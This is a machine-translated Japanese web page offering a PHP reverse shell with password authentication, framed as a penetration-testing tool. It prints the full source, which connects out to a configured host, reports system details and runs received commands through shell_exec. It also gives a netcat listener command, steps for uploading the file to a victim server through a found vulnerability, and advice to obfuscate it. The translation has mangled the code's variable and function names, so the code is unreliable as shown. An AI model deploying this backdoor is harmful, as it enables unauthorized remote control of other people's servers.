シェルv1.0のPHPを逆転 – 認証機能
別製品:
Ashfaqアンサリ
バージョン:
1.0
プライス:
フリー

によるレビュー:
評価:
5
上の 10月 9, 2012
最終更新日:1月 18, 2013

要約:

作り付けの認証機能を有効にしてPHPシェルを接続逆転. あなたのバックドアを保護するための素晴らしいスクリプト.

はじめに

 

このツールは、あなたがアップロードPHPを実行しているWebサーバへのアクセスをしている侵入テストの状況のた​​めに設計されて.
Webルートのどこかに、このスクリプトをアップロードし、ブラウザで適当なURLにアクセスして、それを実行. スクリプトは、ウェブサーバからスクリプトで定義されたホストとポートへのアウトバウンドTCP接続をオープンします. このTCP接続にバインドされ、シェルになります.
 

これは、あなたのようなinterectiveプログラムを実行できる適切な対話型シェルになります テルネットSSH.
このシェルは、あなたのバックドアを悪用から誰かを防ぐ作り付けの認証機能を持っている.
これは、Webフォーム·ベースの単一のコマンドを送信できるようにシェルとは異なります, その後、出力を返す.
 

ソースを変更します

 

1
2
3
$IP = "127.0.0.1"; #あなたの公共のIPに変更
$ポート = 4444;      #あなたのポートに変更し
$パスワード = BASE64_DECODE("aGFja3N5c3RlYW0="); #デフォルトのパスワード: hacksysteam (MD5)

 

あなたの必要性や状況ごとに応じて値を変更する.
 

ソースを難読化

 

一度変更を行っている, あなたは、任意のオンラインを使用することができます PHP難読化ツール PHPスクリプトをエンコードする.
 

例: http://www.codeeclipse.com/
 

難読化前, あなたのニーズに応じて、上記の値を変更してください.
 

セットアップNetcatをリスナー

 

Webサーバからアクセス可能になり、ホストとポートでNetcatをリスナーを起動します.
あなたは、例えば逆シェルスクリプトで指定されているここで同じポートを使用 (4444):
 

1
ルート@ BT:〜# NC -lvvp 4444

 

スクリプトをアップロードし、それを実行して、

 

脆弱性を使用すると、ウェブサイトであなたが発見, アップロード reverse_shell.php.
Webブラウザで新しくアップロードされたファイルを参照するだけでスクリプトを実行.
 

1
HTTP://<犠牲者のIP>/<パスをアップロード>/reverse_shell.php

 

注意: あなたは、Webページ上の任意の出力が表示されません, それは、成功すれば待機モードで継続.
 

あなたのシェルと戦利品

 

ソースコード

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?PHP
###################################################
#               シェルv1.0の番号を逆に
#             認証機能の#
#                                                 #
#            Hacksysチーム - パンテーラ#
#             筆者: Ashfaqアンサリ #
#            hacksysteam@hotmail.com#
#          HTTP://hacksys.vfreaks.com #
#              Linux用に設計さ #
#             #をlionaneeshのおかげ
#             lionaneesh@gmail.com#
###################################################

ini_set('max_execution_timeに',0);

$VERSION = "1.0";
$IP = "127.0.0.1"; #これを変更
$ポート = 4444;      #これを変更
$パスワード = BASE64_DECODE(&quot;aGFja3N5c3RlYW0="); #デフォルトのパスワード: hacksysteam (MD5)

$バナー = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | _ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    PHPでシェルを逆
    筆者: Ashfaqアンサリ
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /\N\N"
);

$PWD = もしくはshell_exec(「PWD");
$SYSINFO = もしくはshell_exec(「uname-aのA");
$イド = もしくはshell_exec('イド | 「カットdを(" -F 2 | 「カットdを)" -F 1 ');
$日付 = もしくはshell_exec("日付");
$のみ = 1337;
$情報 =
("
システム情報:\N$SYSINFO
現在の作業ディレクトリ: $PWD
ユーザグループ: $イド
現在の日時: $日付\N
"
);

印刷 "\Nに接続しよう: $IP ポート上で $ポート ...\N\N";

$sockfdが = すぐにわかる($IP , $ポート , $errnoは, $errstrが );

もし($errnoは != 0)
  {
    印刷 "\N****** エラーが発生しました ******\NエラーNnumber: $errnoは\Nエラー文字列: $errstrが\N\N";
    (0);
  }
ほかに もし (!$sockfdが)
  {
    印刷 "致命的 : 接続しようとしたときに予期しないエラーが発生しました!\N";
  }
ほかに
  {
    印刷 "に接続されている: $IP ポート上で $ポート ...\N\N";
    fputsでは ($sockfdが , $バナー);
    fputsでは($sockfdが ,"パスワードを入力してください: ");
    $getpassは = トリム(fgetsの($sockfdが, strlen関数($パスワード) + 2));

    もし ($getpassは == $パスワード)
    {
      fputsでは($sockfdが, "\N認証成功。.\N");
      fputsでは($sockfdが, $情報);
      同時に(!EOF($sockfdが))
      {
    $cmdPrompt = トリム($イド) . "@" . トリム($IP) . ":〜" . トリム($PWD) . "# ";
    fputsでは ($sockfdが , $cmdPrompt );
    $コマンド = トリム(fgetsの($sockfdが, $のみ));
        もし (トリム($コマンド) == "終了")
    {
      fputsでは($sockfdが ,"\Nユーザーによって中止されました... 終了..." );
      fcloseを($sockfdが);
      (0);
    }
    fputsでは($sockfdが , "\N" . もしくはshell_exec($コマンド) . "\N");
      }
      fcloseを($sockfdが);
      (0);
    }
    ほかに
    {
      fputsでは($sockfdが ,"\N無効なパスワード... 終了...");
      fcloseを($sockfdが);
      (0);
    }
  }
?>

 

スクリーンショット

 


 

リバースシェルv1.0のPHPをダウンロード – 認証機能

 

Reverse_Shell_v1.0.zip

 
 
 

21,011 閲覧, 19 今日の閲覧回数

以下の2つのタブが、以下の内容を変更する.

Ashfaqアンサリ

セキュリティー研究者
Ashfaqアンサリはの創設者であり、 HackSysチーム コー​​ドネーム "ヒョウ属". 彼は、情報セキュリティの様々な側面での経験を持つセキュリティ研究者である. 彼が執筆しています "HackSysエクストリーム脆弱ドライバ" と "死のシェルコード". 彼はまた、書かれており、低レベルのソフトウェア開発のさまざまなホワイトペーパーを公開しています. 彼のコアの関心が内にあり "低レベルの搾取", "リバースエンジニアリング", "プログラム解析" と "ハイブリッドファジング". 彼は人工知能と機械学習のミーハーです. 彼はのための章リードです ヌルプネ.

返信を残す

あなたのメールアドレスは公開されません. 必須フィールドがマークされている *